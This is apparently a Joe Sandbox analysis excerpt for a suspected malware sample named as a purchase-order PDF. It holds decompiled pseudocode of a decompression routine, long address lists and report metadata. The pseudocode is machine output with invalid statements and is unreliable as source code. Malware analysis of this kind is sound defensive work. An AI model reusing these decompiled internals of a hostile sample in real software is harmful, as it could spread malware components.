										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407194
0x00407194
0x00407194
0x00407194
0x0040719a
0x0040719e
0x004071a2
0x004071ac
0x004071ba
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074c7
0x004074cb
0x00000000
0x00000000
0x004074cd
0x004074d6
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074ff
0x00407502
0x00407502
0x00407524
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074cb
0x00000000
0x00000000
0x00000000
0x00407526
0x00407526
0x0040749f
0x004074a3
0x004075db
0x004075db
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x004074a9
0x004074af
0x004074b6
0x004074be
0x004074be
0x004074c1
0x00000000
0x004074c1
0x0040752b
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c03
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x0040754e
0x00000000
0x0040754e
0x00406ca8
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x0040755d
0x00000000
0x0040755d
0x00406d18
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075cf
0x00000000
0x004075cf
0x00407426
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x00000000
0x00406d5f
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407020
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x0040711c
0x00407120
0x00407127
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00407122
0x00000000
0x00000000
0x00407143
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407395
0x00407399
0x004073bb
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00407458
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407543
0x00407546
0x00407447
0x00407447
0x00407447
0x00000000
0x0040744d
0x00000000
0x0040717d
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00000000
0x00000000
0x00000000
0x004071c2
0x004071c2
0x004071c5
0x004071fb
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x004075bd
0x00000000
0x004075bd
0x00407339
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725b
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
